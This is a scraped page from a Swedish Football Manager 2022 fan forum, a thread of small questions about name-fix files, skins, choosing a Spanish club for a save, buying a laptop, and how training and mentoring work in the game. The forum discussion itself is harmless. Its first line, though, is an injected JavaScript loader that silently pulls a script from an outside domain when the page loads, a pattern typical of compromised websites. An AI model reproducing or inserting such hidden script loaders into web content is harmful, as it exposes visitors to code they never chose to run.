;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Småfrågor – Sida 2 – Football Manager 2022 – FMSweden Forum
Meny Stäng

Share:
Notifications
Clear all

[Klistrad] Småfrågor

84 Inlägg
39 Users
64 Reactions
5,736 Visningar
raca14
(@raca14)
Reputable Member

Finns det förresten någon fil ute för att rätta till alla lagnamn (Zebre, SLB, FCP osv)?

Riktigt tråkigt med alla fulnamn på lagen och då önskar jag även att namnen på de brasilianska lagen också ingår från tre VERSALER till de riktiga namnen också.

Edit: Fixade själv via sortitoutsi.

SvaraCitera
Micke
(@micke)
Reputable Member Admin
Topic starter  

https://www.fmscout.com/a-fm22-real-names-license-fix.html

Om någon annan har samma problem 🙂

"I have never played for a draw in my life." - Sir Alex Ferguson

SvaraCitera
(@palst)
Active Member

Har märkt att SI beslutat att Sverige inte förtjänar en deadline day pga för lite intresse (?), men att det går att requesta att de lägger till det för ett visst land om en kan lägga fram bevis för att det finns ett intresse. Ser att folk lagt upp trådar på SIs forum för Danmark och Norge. Jag har ärligt talat lite halvdålig koll på medierapporteringen på deadline day i Sverige, men tror ni att det är möjligt att skrapa ihop tillräckligt för att kunna övertyga SI om att Sverige är tillräckligt viktiga för att de ska göra ansträngning att lägga till det? Eller är SIs bedömning korrekt rentav?

Länkar exempel på hur det danska beviset ser ut.
https://community.sigames.com/bugtracker/football-manager-2022-bugs-forum/football-manager-2022-early-access-beta-bugs-forum/transfers-contracts-scouting-recruitment-meetings-and-staff-responsibilities/request-to-add-transfer-deadline-day-to-the-danish-superliga-r1679/

Micke reacted
SvaraCitera
(@lappe)
Active Member

Lyckas inte få in några skins i mitt spel trots att jag gör som jag alltid gjort samt så som det står på alla sidor jag kollat på.  

Kan någon säga vad jag gör fel?

https://imgur.com/BkVUXPK

https://imgur.com/OrH18yQ

SvaraCitera
raca14
(@raca14)
Reputable Member

Kan någon rekommendera några fina skins?

Vill inte ha något som är varken alldeles för ljust eller mörkt... 🙂

Och någon som har koll på de supertalanger som är för unga för att SI ska lägga in dom i spelet?

Har bara lyckats hitta "shortlist" på de befintliga spelarna...

Micke reacted
SvaraCitera
(@palst)
Active Member

@raca14 Jag tycker om Rensies skin. Mer förbättring av orginalskinet snarare än massa krusiduller och reklam för skinskaparen. Men det är väl som personligt. 🙂

https://coffeehousefm.com/rensieskin

SvaraCitera
Svempa
(@svempa)
Active Member

@palst älskar att det första som kommer upp när man trycker på länken är Wayne Rooney i GAIS

Micke reacted
SvaraCitera
(@yjoben)
New Member

Fem byten vid tre bytestillfällen i Allsvenskan, är det möjligt att gå in i editorn och göra en ändring så att det är så framöver?

SvaraCitera
Flourix
(@flourix)
Trusted Member

@raca14 

Bugg fortfarande kvar i fullversionen 🙁 

SvaraCitera
Micke
(@micke)
Reputable Member Admin
Topic starter  

@yjoben Yes, det ska gå att ändra i editorn. 

"I have never played for a draw in my life." - Sir Alex Ferguson

SvaraCitera
Phansell
(@phansell)
Trusted Member

@yjoben Är det inte så säsongen 2021 bara?

"Say it loud, say it clear, refugees are welcome here!"
- FC St Pauli

SvaraCitera
(@pizarro)
Eminent Member

Är sugen på att dra igång en save med FM22. Har tagit fram en bruttolista med lag. 

1. Real Zaragoza. De har efter nedflyttningen för ca 10 år sedan fastnat i la Segunda. Har en del intressanta egna produkter. Har en sliten arena som tar ca 30 000. Helt okej träningsfaciliteter samt ungdomsakademi. 58/25 säsonger i la Primera respektive la Segunda. Mittenplacering för att år två utmana om kvalplatserna. 

2. Sporting Gijon. Likande läge Real Zaragoza. 42/49 säsonger i la Primera respektive la Segunda. Mittenplacering för att år två utmana om kvalplatserna. 

3. Racing Santander. De har efter uttåget av högsta divisionen åkt ned enda till 3 div. Har även de en del spännande spelare. Ytterligare ett hack ned i seriepyramiden vilket är en utmaning i sig. Slåss med Deportivo om att ta klivet upp. El Sardinero tar 22 222 åskådare. 44/35 antal säsonger i la Primera och Segunda division. 

4. Lugo. Konkurrerar i samma region som Celta och Deportivo. Något ålderstigen trupp. Liten arena. Överlag dåliga faciliteter. 

5. Real Oviedo. Var på väg att gå i konkurs innan supportrarna med Mata och Cazorla gick in och räddade klubben. Har senaste åren spelat i la Segunda. Slåss med Sporting i samma region. 38/40 i två högsta divisionerna. 

Nu vill jag höra era tankar om vad ni helst läser om. Tanken är att det ska typ bli enda saven för mig med denna upplaga. Långsiktighet är grundbulten. 

Micke and trashbag reacted
SvaraCitera
trashbag
(@trashbag)
Reputable Member Admin

Ska jag ranka lagen så skulle det väl vara Sporting Gijon -> Real Oviedo -> Lugo -> Racing Santander -> Real Zaragoza.

Zaragoza och Racing känns väl som dom mest välkända för den "svenska publiken" så därför vill jag helst att du spelar med något av dom andra lagen. Lugo kanske är lite väl okända dock och kanske inte uppskattas av läsarna här på FMSweden om du skulle skriva om dom. Således landar jag i Sporting Gijón eller Real Oviedo 🙂

Micke and pizarro reacted
SvaraCitera
Argt Troll
(@argt-troll)
Reputable Member

Postad av: @pizarro

Är sugen på att dra igång en save med FM22. Har tagit fram en bruttolista med lag. 

1. Real Zaragoza. De har efter nedflyttningen för ca 10 år sedan fastnat i la Segunda. Har en del intressanta egna produkter. Har en sliten arena som tar ca 30 000. Helt okej träningsfaciliteter samt ungdomsakademi. 58/25 säsonger i la Primera respektive la Segunda. Mittenplacering för att år två utmana om kvalplatserna. 

2. Sporting Gijon. Likande läge Real Zaragoza. 42/49 säsonger i la Primera respektive la Segunda. Mittenplacering för att år två utmana om kvalplatserna. 

3. Racing Santander. De har efter uttåget av högsta divisionen åkt ned enda till 3 div. Har även de en del spännande spelare. Ytterligare ett hack ned i seriepyramiden vilket är en utmaning i sig. Slåss med Deportivo om att ta klivet upp. El Sardinero tar 22 222 åskådare. 44/35 antal säsonger i la Primera och Segunda division. 

4. Lugo. Konkurrerar i samma region som Celta och Deportivo. Något ålderstigen trupp. Liten arena. Överlag dåliga faciliteter. 

5. Real Oviedo. Var på väg att gå i konkurs innan supportrarna med Mata och Cazorla gick in och räddade klubben. Har senaste åren spelat i la Segunda. Slåss med Sporting i samma region. 38/40 i två högsta divisionerna. 

Nu vill jag höra era tankar om vad ni helst läser om. Tanken är att det ska typ bli enda saven för mig med denna upplaga. Långsiktighet är grundbulten. 

Zaragoza tilltalar ju mest. Endast av sentimentala skäl. Vilka spelare man hade för lite mer än ett decennium sedan. Bröderna Milito, Sergio Garcia, Ricardo Oliveira, Aimar och Ander Herrera för att nämna några.

SvaraCitera
zXc
 zXc
(@zxc)
Estimable Member

Tja! Behöver köpa en ny dator för att kunna hitta ett bättre flyt i FM. Min nuvarande laptop är otroligt långsam. 

Vill helst ha en laptop, men stationär kanske är bättre för prestandan? 

Behövs det mer än 8 GB RAM? 

Förslag på prisvärda datorer? 

Maxbudget: 8000 

SvaraCitera
Peter Hecktor
(@peter-hecktor)
Ägare

Postad av: @zxc

Tja! Behöver köpa en ny dator för att kunna hitta ett bättre flyt i FM. Min nuvarande laptop är otroligt långsam. 

Vill helst ha en laptop, men stationär kanske är bättre för prestandan? 

Behövs det mer än 8 GB RAM? 

Förslag på prisvärda datorer? 

Maxbudget: 8000 

Här har du en fin. i7 med 16gb RAM som kommer flyta fint.

https://www.elgiganten.se/product/datorer-tillbehor/barbar-dator/windows-laptops/339411/acer-swift-3-14-barbar-dator-i716512?&scid=SEM6818814135&utm_source=google_search&utm_medium=SEM&utm_campaign=google-pla&utm_content=computer&gclid=Cj0KCQiAys2MBhDOARIsAFf1D1ceztgJbtj5nqAoCgqERPNKzx3_j3AAuAzBlOoqHFUbMqwnIMwiIF0aAui-EALw_wcB&gclsrc=aw.ds

Micke reacted
SvaraCitera
Daniel Nilsson
(@daniel-nilsson)
Noble Member Admin

@saints83 träning kan i stora drag delas upp i två delar - Generell och Individuell träning.

Generell träning = den träning som laget utför tillsammans, det som du hittar under Träning -> Scheman i vänstermenyn. Här kan du bygga egna träningsscheman vilket jag rekommenderar då din assisterande utelämnar många träningstillfällen. Sen är det inte alltid lätt att förstå innebörden med hur du ska lägga upp träningen men det finns en fin introduktion i spelet som du kan börja läsa igenom.

Individuell träning = den träning som varje unik spelare utför själv, det som du hittar under Träning -> Individuell eller om du går in på en spelare och trycker på Utveckling -> Träning. Här jobbar du specifikt med den spelare du är inne på och kan fokusera på positioner, attribut eller varför inte föredragna handlingar? Även här rekommenderar jag dig att grotta ner dig i vad som kan vara bra och vad som inte behöver läggas så mycket energi på. Exempelvis föredragna handlingar är något jag jobbar mycket med.

Vi har emellanåt spelare som är missnöjda med sin träning, individuellt som generellt och här kan det ibland upplevas som att även om man justerar träningen efter missnöjet så är spelaren/spelarna fortsatt missnöjda. Att en spelare är missnöjd innebär inte direkt problem det är om en spelare stagnerar eller till och med utvecklas å det sämre hållet som du behöver hålla koll på. Där får du fundera på varför det är som det är. Kan det handla om att en spelare inte är så träningsflitig som resten av truppen? Är spelaren på väg tillbaka från en skada och har för hög arbetsbelastning? Kanske är dina tränare för dåliga och inte kan erbjuda den nivå av träning som spelaren behöver? Eller så passar träningen inte honom helt enkelt. Viktigt att utreda för att få helhetsbilden.

Avslutningsvis så vill jag slå ett slag för att ändra intensiteten på träningsbelastningen när en spelare är 100% frisk, det gröna hjärtat. Om du går in på Träning -> Vila och ändrar det gröna hjärtat längst till höger till Dubbel intensitet. Ett varningens finger höjer jag dock; nyttja endast detta när du har en normal vecka vilket för mig är en match. Är det fler matcher än det så brukar jag låta intensiteten stå på Normal. Glöm heller inte att låta spelaren veta när han gör en bra träningsvecka heller. För mig går gränsen vid 9.0 i träningsbetyg och då tar jag ett individuellt snack med honom och berättar hur nöjd jag är.

Argt Troll, raca14 and Micke reacted
SvaraCitera
Argt Troll
(@argt-troll)
Reputable Member

Postad av: @daniel-nilsson

@saints83 träning kan i stora drag delas upp i två delar - Generell och Individuell träning.

Generell träning = den träning som laget utför tillsammans, det som du hittar under Träning -> Scheman i vänstermenyn. Här kan du bygga egna träningsscheman vilket jag rekommenderar då din assisterande utelämnar många träningstillfällen. Sen är det inte alltid lätt att förstå innebörden med hur du ska lägga upp träningen men det finns en fin introduktion i spelet som du kan börja läsa igenom.

Individuell träning = den träning som varje unik spelare utför själv, det som du hittar under Träning -> Individuell eller om du går in på en spelare och trycker på Utveckling -> Träning. Här jobbar du specifikt med den spelare du är inne på och kan fokusera på positioner, attribut eller varför inte föredragna handlingar? Även här rekommenderar jag dig att grotta ner dig i vad som kan vara bra och vad som inte behöver läggas så mycket energi på. Exempelvis föredragna handlingar är något jag jobbar mycket med.

Vi har emellanåt spelare som är missnöjda med sin träning, individuellt som generellt och här kan det ibland upplevas som att även om man justerar träningen efter missnöjet så är spelaren/spelarna fortsatt missnöjda. Att en spelare är missnöjd innebär inte direkt problem det är om en spelare stagnerar eller till och med utvecklas å det sämre hållet som du behöver hålla koll på. Där får du fundera på varför det är som det är. Kan det handla om att en spelare inte är så träningsflitig som resten av truppen? Är spelaren på väg tillbaka från en skada och har för hög arbetsbelastning? Kanske är dina tränare för dåliga och inte kan erbjuda den nivå av träning som spelaren behöver? Eller så passar träningen inte honom helt enkelt. Viktigt att utreda för att få helhetsbilden.

Avslutningsvis så vill jag slå ett slag för att ändra intensiteten på träningsbelastningen när en spelare är 100% frisk, det gröna hjärtat. Om du går in på Träning -> Vila och ändrar det gröna hjärtat längst till höger till Dubbel intensitet. Ett varningens finger höjer jag dock; nyttja endast detta när du har en normal vecka vilket för mig är en match. Är det fler matcher än det så brukar jag låta intensiteten stå på Normal. Glöm heller inte att låta spelaren veta när han gör en bra träningsvecka heller. För mig går gränsen vid 9.0 i träningsbetyg och då tar jag ett individuellt snack med honom och berättar hur nöjd jag är.

Hur viktig roll skulle du säga att ens hjälptränare har för spelarens utveckling? Känns som spelare med låg beslutsamhet kan behöva en riktigt duktig och beslutsam hjälptränare.

SvaraCitera
Daniel Nilsson
(@daniel-nilsson)
Noble Member Admin

Postad av: @argt-troll

Hur viktig roll skulle du säga att ens hjälptränare har för spelarens utveckling? Känns som spelare med låg beslutsamhet kan behöva en riktigt duktig och beslutsam hjälptränare.

En spelares beslutsamhet har inte direkt med en tränares beslutsamhet att göra utan här tror jag vi behöver skilja dem åt, tänk dig att de vandrar på varsin parallell linje. Du kan även när du är inne på en tränare eller spelare hovra över ett av attributen, exempelvis Beslutsamhet, för att läsa vad FM skrivit om det. Så här resonerar jag;

Din tränare har tre syskonattribut - Beslutsamhet, Grad av disciplin & Motivera - vilka är grundläggande attribut för samtliga tränare. Dessa ger dig en indikation på hur väl din coach utför sin själva träning. Ju högre värde desto bättre träning.

Om du istället går in på din spelare så har han ett ännu större urval av attribut som bestämmer hur bra denne är - nu snackar vi grundkurs och det vet jag att du sedan många år tillbaka är förbi. Hans attribut Beslutsamhet hänger ihop med Beslut och Förutseende vilka är de tre grundattributen för en spelare - ju högre värde desto bättre, you know the drill. Med dessa tre attribut ger oss då en uppfattning om hur bra en spelare är på och utanför plan, viljan att lyckas samt förutspå och kunna läsa av spelet.

Så indirekt har en tränarens Beslutsamhet att göra med spelarens mentala attribut - inte enbart spelarens attribut Beslutsamhet. Det är lätt att stirra sig blind på när saker heter exakt likadant men här skulle jag vilja skilja dem åt på så sätt.

Jag kastar in mitt bästa tips för att höja en spelarens Beslutsamhet - Mentorskap! Har jag en grupp med spelare som har ett lägre värde i det nämnda attributet så brukar jag överväga att ta in en äldre spelare med en positiv personlighet som har ett högt värde i Beslutsamhet. Där tenderar jag se förbättringar. Men då är det viktigt att spelarna med låg beslutsamhet inte har för stor effekt på gruppen - då kan det bli omvänt.

Argt Troll reacted
SvaraCitera
Argt Troll
(@argt-troll)
Reputable Member

Postad av: @daniel-nilsson
Postad av: @argt-troll

En spelares beslutsamhet har inte direkt med en tränares beslutsamhet att göra utan här tror jag vi behöver skilja dem åt, tänk dig att de vandrar på varsin parallell linje. Du kan även när du är inne på en tränare eller spelare hovra över ett av attributen, exempelvis Beslutsamhet, för att läsa vad FM skrivit om det. Så här resonerar jag;

Din tränare har tre syskonattribut - Beslutsamhet, Grad av disciplin & Motivera - vilka är grundläggande attribut för samtliga tränare. Dessa ger dig en indikation på hur väl din coach utför sin själva träning. Ju högre värde desto bättre träning.

Om du istället går in på din spelare så har han ett ännu större urval av attribut som bestämmer hur bra denne är - nu snackar vi grundkurs och det vet jag att du sedan många år tillbaka är förbi. Hans attribut Beslutsamhet hänger ihop med Beslut och Förutseende vilka är de tre grundattributen för en spelare - ju högre värde desto bättre, you know the drill. Med dessa tre attribut ger oss då en uppfattning om hur bra en spelare är på och utanför plan, viljan att lyckas samt förutspå och kunna läsa av spelet.

Så indirekt har en tränarens Beslutsamhet att göra med spelarens mentala attribut - inte enbart spelarens attribut Beslutsamhet. Det är lätt att stirra sig blind på när saker heter exakt likadant men här skulle jag vilja skilja dem åt på så sätt.

Jag kastar in mitt bästa tips för att höja en spelarens Beslutsamhet - Mentorskap! Har jag en grupp med spelare som har ett lägre värde i det nämnda attributet så brukar jag överväga att ta in en äldre spelare med en positiv personlighet som har ett högt värde i Beslutsamhet. Där tenderar jag se förbättringar. Men då är det viktigt att spelarna med låg beslutsamhet inte har för stor effekt på gruppen - då kan det bli omvänt.

Kung Kaki! Ja, mentorskapet har i alla år varit guld. Vet dock inte hur det är på senare år när man har mentorgrupper och inte individuella mentorer. Var kanske lite väl OP förr?

SvaraCitera
Sida 2 / 5
Share: